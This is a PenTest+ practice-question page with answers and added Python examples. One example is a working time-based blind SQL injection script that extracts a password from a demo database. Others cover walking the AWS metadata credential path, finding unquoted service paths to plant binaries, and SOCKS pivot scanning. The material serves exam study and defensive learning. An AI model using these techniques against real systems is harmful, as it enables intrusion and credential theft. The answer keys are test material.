Free PenTest Plus Practice Questions
10 free, exam-style PenTest Plus practice questions with answers and explanations. No signup required. Work through them below, then take the full free PenTest Plus practice test to study every exam domain.
Question 1
During an internal penetration test of an Active Directory environment, a tester uses BloodHound and identifies several service accounts with Service Principal Names (SPNs) registered. The tester requests Kerberos TGS tickets for these accounts without sending any traffic to the service hosts themselves. Which attack is the tester performing?
- AS-REP Roasting
- Golden Ticket
- Kerberoasting
- Pass-the-Ticket
Correct answer: C - Kerberoasting
Question 2
A penetration tester runs the following command against a target network:
nmap -sS -p- -T4 10.10.10.0/24 -oX results.xml
Which of the following BEST describes what this command does?
- Performs a full TCP connect scan of the top 1,000 ports and saves output in grepable format
- Performs a SYN scan of all 65,535 ports with aggressive timing and saves output in XML format
- Performs a UDP scan of all ports with default timing and saves output in XML format
- Performs a SYN scan of common ports with insane timing and saves output in normal format
Correct answer: B - Performs a SYN scan of all 65,535 ports with aggressive timing and saves output in XML format
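Two points worth knowing beyond the answer: -sS needs root or administrator privileges because it sends raw SYN packets, and -oX exists so that the results can be parsed by other tools rather than read by eye (-oG is the grepable format and -oA writes all three). The following is an added example, not code from the original page, that parses a results.xml file in the real nmaprun layout; the XML document inside it is a constructed sample with the question's address range, not a real scan.

```python
"""Parse the XML that `nmap -oX results.xml` writes and summarise open ports.

Added example, not code from the original page. SAMPLE_XML is a constructed,
trimmed document in the real nmaprun format (host, status, address, ports,
state and service elements); the addresses are taken from the question.
"""
import xml.etree.ElementTree as ET

# Constructed sample of what results.xml looks like after the scan in the question.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sS -p- -T4 10.10.10.0/24 -oX results.xml">
  <scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
  <host>
    <status state="up"/>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="8443"><state state="filtered"/><service name="https-alt"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.10.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.10.10.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: [(port, protocol, service), ...]} for open ports on hosts that are up."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                      # down hosts carry no port data worth reporting
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        open_ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                  # filtered/closed ports are dropped here
            svc = port.find("service")
            svc_name = svc.get("name") if svc is not None else "unknown"
            open_ports.append((int(port.get("portid")), port.get("protocol"), svc_name))
        results[addr_el.get("addr")] = sorted(open_ports)
    return results


def scan_summary(xml_text):
    """Scan type, port range and command line as nmap recorded them (report evidence)."""
    root = ET.fromstring(xml_text)
    info = root.find("scaninfo")
    return {"type": info.get("type"), "services": info.get("services"), "args": root.get("args")}


if __name__ == "__main__":
    print(scan_summary(SAMPLE_XML))
    for ip, ports in parse_nmap_xml(SAMPLE_XML).items():
        print(ip, ports)
```

The scaninfo element records the scan type nmap actually performed, which is the check to use when a report needs to prove that a SYN scan (rather than a connect scan) was run.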
Question 3
A penetration tester submits a single quotation mark (') into a web application's search field and notices the page loads significantly slower than normal but returns no error messages or visible changes in the response content. The tester then submits a payload that causes a 10-second delay using a WAITFOR DELAY statement, which succeeds. Which type of SQL injection has the tester confirmed?
- UNION-based SQL injection
- Error-based SQL injection
- Time-based blind SQL injection
- Out-of-band SQL injection
Correct answer: C - Time-based blind SQL injection
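The confirmation step in the question (a true condition delays the response, a false one does not) is also the primitive used to read data out of the database afterwards. The following is an added example, not code from the original page: it builds a deliberately vulnerable search function over SQLite, registers a user-defined waitfor() SQL function to stand in for MSSQL's WAITFOR DELAY (SQLite has no native delay), confirms the injection by timing, and then recovers a constructed password one character at a time. The tables, the secret and the search function are all constructed for the demo.

```python
"""Time-based blind SQL injection, carried out end to end against SQLite.

Added example, not code from the original page. SQLite has no WAITFOR DELAY, so a
user-defined SQL function waitfor(seconds) is registered to play that role; the
vulnerable search function and the users/products tables are constructed for the demo.
"""
import sqlite3
import time

DELAY = 0.15            # seconds the injected condition sleeps when it is true
THRESHOLD = DELAY / 2   # elapsed time above this is read as "the condition was true"


def build_db():
    conn = sqlite3.connect(":memory:")
    # Stand-in for MSSQL's WAITFOR DELAY / MySQL's SLEEP(): returns 0 after sleeping.
    conn.create_function("waitfor", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE products(name TEXT)")
    conn.execute("INSERT INTO products VALUES ('widget')")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cr')")  # constructed secret
    return conn


def vulnerable_search(conn, term):
    """The flaw: the search term is concatenated straight into the SQL text."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def timed_request(conn, term):
    """Return (rows, seconds). Errors are swallowed, so the tester sees no error text."""
    start = time.perf_counter()
    try:
        rows = vulnerable_search(conn, term)
    except sqlite3.Error:
        rows = []
    return rows, time.perf_counter() - start


def condition_is_true(conn, condition):
    """One blind query: sleep only when the condition holds, then decide by elapsed time."""
    payload = "x' OR CASE WHEN (%s) THEN waitfor(%s) ELSE 0 END -- " % (condition, DELAY)
    _, elapsed = timed_request(conn, payload)
    return elapsed >= THRESHOLD


def confirm_time_based(conn):
    """The confirmation step from the question: a true condition delays, a false one does not."""
    return condition_is_true(conn, "1=1") and not condition_is_true(conn, "1=2")


def extract_secret(conn, length=4):
    """Recover users.password one character at a time by binary search on its code point."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((SELECT password FROM users LIMIT 1), %d, 1)) > %d" % (pos, mid)
            if condition_is_true(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("time-based blind confirmed:", confirm_time_based(db))
    print("recovered password:", extract_secret(db))
```

The binary search is why a real engagement measures the baseline first and picks a delay well above network jitter: every character costs about seven timed requests, and a threshold set too close to the baseline turns noise into wrong characters.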
Question 4
A penetration tester discovers a Server-Side Request Forgery (SSRF) vulnerability in a web application hosted on an AWS EC2 instance. The tester crafts a request that causes the server to query http://169.254.169.254/latest/meta-data/. What is the tester attempting to retrieve?
- IAM role credentials attached to the instance
- The EC2 instance's stored S3 backup encryption keys
- The AWS root account password hash
- CloudTrail audit logs for the account
Correct answer: A - IAM role credentials attached to the instance
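After listing /latest/meta-data/, the tester walks to /latest/meta-data/iam/security-credentials/, which names the attached role, and then to that role name, which returns temporary AccessKeyId, SecretAccessKey and Token values usable from anywhere. Two practitioner notes: with IMDSv2 enforced (HttpTokens=required) the credentials endpoint only answers requests that carry a session token obtained via a PUT to /latest/api/token, which a GET-only SSRF cannot produce, and a hop limit of 1 stops the token being fetched through a container or forwarder; and string filters on "169.254.169.254" are bypassed by integer spellings of the same address. The following is an added example, not code from the original page, showing a server-side check an application could apply before fetching a user-supplied URL. check_fetch_target is a hypothetical helper name, the block makes no network requests, and it does not cover inet_aton-style shortened or octal address forms.

```python
"""Guarding server-side fetches against the metadata-service SSRF in the question.

Added example, not code from the original page. The metadata URL and the
169.254.169.254 address are the real AWS ones; check_fetch_target is a
hypothetical application helper, and the block makes no network requests.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Where the attacker goes after /latest/meta-data/: listing this path gives the role
# name, and appending it returns temporary AccessKeyId/SecretAccessKey/Token values.
IMDS_CREDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",   # link-local; includes the instance metadata service
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fe80::/10", "fd00::/8",
)]


def host_as_ip(host):
    """Return the address a host literal denotes, or None if it is a DNS name.

    Accepts dotted form plus the decimal (2852039166) and hex (0xa9fea9fe) spellings
    that HTTP clients resolve to 169.254.169.254 and that plain string filters miss.
    """
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))
    except ValueError:
        return None


def destination_addresses(host):
    """All addresses a fetch to host could reach (every DNS answer, not just the first)."""
    ip = host_as_ip(host)
    if ip is not None:
        return [ip]
    return [ipaddress.ip_address(info[4][0]) for info in socket.getaddrinfo(host, None)]


def is_blocked(url):
    """True if the URL targets the metadata service or any internal network."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True
    return any(addr in net for addr in destination_addresses(parts.hostname)
               for net in BLOCKED_NETS)


def check_fetch_target(url):
    """Hypothetical helper an app would call before fetching a user-supplied URL.

    Remaining gap: the name must be resolved once here and the connection pinned to
    that address, or a rebinding DNS name can pass the check and later resolve to
    169.254.169.254 at connect time.
    """
    if is_blocked(url):
        raise ValueError("refusing to fetch internal destination: " + url)
    return url


if __name__ == "__main__":
    for u in (IMDS_CREDS, "http://2852039166/latest/meta-data/", "http://93.184.216.34/"):
        print(u, "blocked" if is_blocked(u) else "allowed")
```

Redirects need the same check on every hop, since a permitted external URL that 302s to the metadata address defeats a check applied only to the initial request.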
Question 5
After running an authenticated vulnerability scan against a web server, the scanner reports a critical remote code execution vulnerability. The penetration tester manually attempts to exploit the finding using the exact CVE referenced but confirms that the server has already been patched. Which term BEST describes this scanner result?
- True positive
- True negative
- False negative
- False positive
Correct answer: D - False positive
Question 6
A penetration tester has gained initial access to a Linux host inside a corporate network. The host's firewall blocks all inbound connections but allows outbound HTTP traffic. Which method should the tester use to establish an interactive shell?
- Start a bind shell listener on the compromised host
- Use a reverse shell that connects back to the tester's external listener
- Open an SSH server on the compromised host and connect from the attack machine
- Deploy a netcat listener on an unused port above 1024 on the target
Correct answer: B - Use a reverse shell that connects back to the tester's external listener
Question 7
During the reconnaissance phase, a penetration tester queries certificate transparency logs, reviews the target's job postings on LinkedIn, and searches cached pages using the Wayback Machine. The tester has NOT sent any packets directly to the target's infrastructure. Which type of reconnaissance is being performed?
- Passive reconnaissance
- Active reconnaissance
- Vulnerability scanning
- Enumeration
Correct answer: A - Passive reconnaissance
Question 8
After completing a penetration test, a tester documents a step-by-step account of how an initial phishing email led to credential capture, lateral movement through SMB relay, and ultimately domain administrator access by exploiting a misconfigured certificate template. In which section of the final report does this documentation belong?
- Executive summary
- Methodology
- Detailed findings
- Attack narrative
Correct answer: D - Attack narrative
Question 9
A penetration tester gains standard user access on a Windows 10 workstation and runs the command:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\"
The output reveals a service with the path C:\Program Files\Internal App\update service\svc.exe running as SYSTEM. What should the tester attempt next?
- Modify the Windows registry Run key to add a payload that executes at user login
- Inject a malicious DLL into the svc.exe process while it is actively running in memory
- Extract stored credentials from the LSASS process memory using Mimikatz
- Place a malicious executable at C:\Program.exe to exploit the unquoted path
Correct answer: D - Place a malicious executable at C:\Program.exe to exploit the unquoted path. Because the path contains spaces and is not wrapped in quotes, CreateProcess cannot tell where the program name ends and tries C:\Program.exe, then C:\Program Files\Internal.exe, then C:\Program Files\Internal App\update.exe before the real binary. In practice the tester checks each of those locations with icacls first: by default a standard user can create folders but not files in the root of C:\, so a writable directory deeper in the path is usually the real target, and the planted binary only runs as SYSTEM once the service restarts (on reboot for an Auto-start service, or sooner if the tester has permission to stop and start it).
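The command in the question keeps Auto-start services outside C:\Windows but does not drop paths that are already quoted, which is the step that actually identifies the vulnerable ones. The following is an added example, not code from the original page: it works over a constructed imitation of the CSV form of the same wmic query (wmic service get name,pathname,startmode /format:csv), applies that missing filter, and lists the files Windows would try to run for each unquoted path, in the order it tries them. The service names and paths other than the one in the question are invented.

```python
"""Finding unquoted service paths and the files Windows would try for them.

Added example, not code from the original page. The listing below is a constructed
imitation of `wmic service get name,pathname,startmode /format:csv`, which is easier
to parse than the column output in the question and carries the same fields.
"""
import csv
import io

# Constructed wmic CSV output: the Vendor service path is correctly quoted, the
# Internal App one (from the question) is not, and the Legacy one is not Auto-start.
WMIC_CSV = r'''Node,Name,PathName,StartMode
WS01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WS01,InternalUpd,C:\Program Files\Internal App\update service\svc.exe,Auto
WS01,VendorAgent,"""C:\Program Files\Vendor\Agent Service\agent.exe"" -service",Auto
WS01,LegacySvc,C:\Legacy Apps\legacy.exe,Manual
'''


def parse_wmic_csv(text):
    return list(csv.DictReader(io.StringIO(text.strip())))


def is_unquoted_with_spaces(pathname):
    """The filter the question's pipeline omits: a path that does not start with a
    quote and still contains a space is the vulnerable shape."""
    p = pathname.strip()
    return not p.startswith('"') and " " in p


def candidate_paths(pathname):
    """Files CreateProcess tries, in order, before reaching the intended executable.

    With no quotes it cannot tell where the program name ends, so it cuts the string at
    each space, appends .exe when that fragment has no extension, and tries to run it.
    """
    parts = pathname.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        frag = " ".join(parts[:i])
        candidates.append(frag if frag.lower().endswith(".exe") else frag + ".exe")
    return candidates


def unquoted_auto_services(text):
    """Replicates the question's pipeline (Auto start, not under the Windows directory)
    and then keeps only paths that are unquoted and contain a space."""
    found = []
    for row in parse_wmic_csv(text):
        path = row["PathName"]
        if row["StartMode"].lower() != "auto":
            continue
        if path.lower().startswith(r"c:\windows"):
            continue
        if is_unquoted_with_spaces(path):
            found.append({"Name": row["Name"], "PathName": path,
                          "Candidates": candidate_paths(path)})
    return found


if __name__ == "__main__":
    for svc in unquoted_auto_services(WMIC_CSV):
        print(svc["Name"], svc["PathName"])
        for c in svc["Candidates"]:
            print("   would try:", c)
```

The candidate list is what to feed to icacls on the target: a directory where Users, Authenticated Users or Everyone hold (W), (M) or (F) is the one to plant the binary in.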
Question 10
A penetration tester compromises a dual-homed server that has one interface on the DMZ (10.0.1.0/24) and another on an internal network segment (192.168.50.0/24) not reachable from the tester's attack machine. The tester needs to run Nmap scans against hosts on the internal segment. Which approach is MOST appropriate?
- Perform an ARP scan from the tester's machine targeting the 192.168.50.0/24 range directly
- Use Responder on the compromised server to passively capture internal NTLM hashes
- Configure an SSH SOCKS proxy through the compromised host and route scans via Proxychains
- Install a standalone Nmap binary directly on the compromised server and scan from there
Correct answer: C - Configure an SSH SOCKS proxy through the compromised host and route scans via Proxychains
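The usual sequence is ssh -D 1080 -N user@dmz-host from the attack machine (with a socks5 127.0.0.1 1080 line in proxychains.conf), then proxychains nmap -sT -Pn -p 22,445,3389 192.168.50.0/24. The -sT and -Pn flags are not optional: a SOCKS proxy only performs TCP connects on the scanner's behalf, so SYN scans, UDP scans and ICMP host discovery cannot pass through it. The following is an added example, not code from the original page, that shows the exchange behind that: a SOCKS5 CONNECT client that turns reply codes into open/closed verdicts, plus a minimal SOCKS5 server standing in for the ssh -D listener so the block runs offline against ports on 127.0.0.1. The two-host layout and all ports are constructed.

```python
"""A TCP connect scan through a SOCKS5 proxy: what `proxychains nmap -sT -Pn` does over
the tunnel that `ssh -D 1080 -N user@dmz-host` opens.

Added example, not code from the original page. So that it runs offline it includes a
minimal SOCKS5 server standing in for the ssh -D listener and uses ports on 127.0.0.1
as the "internal" hosts; the whole layout is constructed.
"""
import socket
import struct
import threading

SOCKS_VER, CMD_CONNECT, ATYP_IPV4 = 5, 1, 1
REP_SUCCESS, REP_REFUSED, REP_CMD_UNSUPPORTED = 0, 5, 7


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("short read")
        buf += chunk
    return buf


def socks5_connect(proxy, target_ip, target_port, timeout=3.0):
    """Ask the proxy to CONNECT to target; return (reply code, socket or None).

    The proxy performs the TCP handshake from the pivot host and reports only a reply
    code: no raw packets leave the scanner, so SYN, UDP and ICMP scans cannot work
    this way, only full connects (-sT) with host discovery disabled (-Pn).
    """
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        s.sendall(bytes([SOCKS_VER, 1, 0]))                 # greeting: 1 method, "no auth"
        ver, method = recv_exact(s, 2)
        if ver != SOCKS_VER or method != 0:
            raise ConnectionError("proxy refused the no-auth method")
        s.sendall(struct.pack("!BBBB4sH", SOCKS_VER, CMD_CONNECT, 0, ATYP_IPV4,
                              socket.inet_aton(target_ip), target_port))
        reply = recv_exact(s, 10)                           # VER REP RSV ATYP BND.ADDR BND.PORT
        if reply[1] == REP_SUCCESS:
            return REP_SUCCESS, s
        s.close()
        return reply[1], None
    except Exception:
        s.close()
        raise


def connect_scan(proxy, target_ip, ports):
    """Return {port: 'open' | 'closed'}, the same verdicts a -sT scan would give."""
    verdicts = {}
    for port in ports:
        rep, s = socks5_connect(proxy, target_ip, port)
        verdicts[port] = "open" if rep == REP_SUCCESS else "closed"
        if s is not None:
            s.close()
    return verdicts


class TinySocks5Proxy(threading.Thread):
    """Stand-in for the ssh -D listener: no auth, IPv4 CONNECT only, no data relay."""

    def __init__(self):
        super().__init__(daemon=True)
        self.listener = socket.socket()
        self.listener.bind(("127.0.0.1", 0))
        self.listener.listen(8)
        self.address = self.listener.getsockname()

    def run(self):
        while True:
            client, _ = self.listener.accept()
            threading.Thread(target=self.handle, args=(client,), daemon=True).start()

    def handle(self, client):
        with client:
            _, nmethods = recv_exact(client, 2)
            recv_exact(client, nmethods)
            client.sendall(bytes([SOCKS_VER, 0]))            # accept "no auth"
            _, cmd, _, atyp = recv_exact(client, 4)
            if cmd != CMD_CONNECT or atyp != ATYP_IPV4:
                client.sendall(bytes([SOCKS_VER, REP_CMD_UNSUPPORTED, 0, ATYP_IPV4]) + b"\0" * 6)
                return
            addr = socket.inet_ntoa(recv_exact(client, 4))
            (port,) = struct.unpack("!H", recv_exact(client, 2))
            try:
                socket.create_connection((addr, port), timeout=2).close()  # the real handshake
                rep = REP_SUCCESS
            except OSError:
                rep = REP_REFUSED
            client.sendall(bytes([SOCKS_VER, rep, 0, ATYP_IPV4]) + b"\0" * 6)


def demo():
    """One listening 'internal' port and one closed one, scanned through the proxy."""
    internal = socket.socket()
    internal.bind(("127.0.0.1", 0))
    internal.listen(1)
    open_port = internal.getsockname()[1]
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                                           # nothing listens here now
    proxy = TinySocks5Proxy()
    proxy.start()
    try:
        return connect_scan(proxy.address, "127.0.0.1", [open_port, closed_port]), open_port, closed_port
    finally:
        internal.close()


if __name__ == "__main__":
    verdicts, o, c = demo()
    print("open port %d -> %s, closed port %d -> %s" % (o, verdicts[o], c, verdicts[c]))
```

Because every probe is a full connect made by the pivot host, the internal targets log a completed connection from the DMZ server's address for each port tested, which is worth noting in the report and when tuning scan scope.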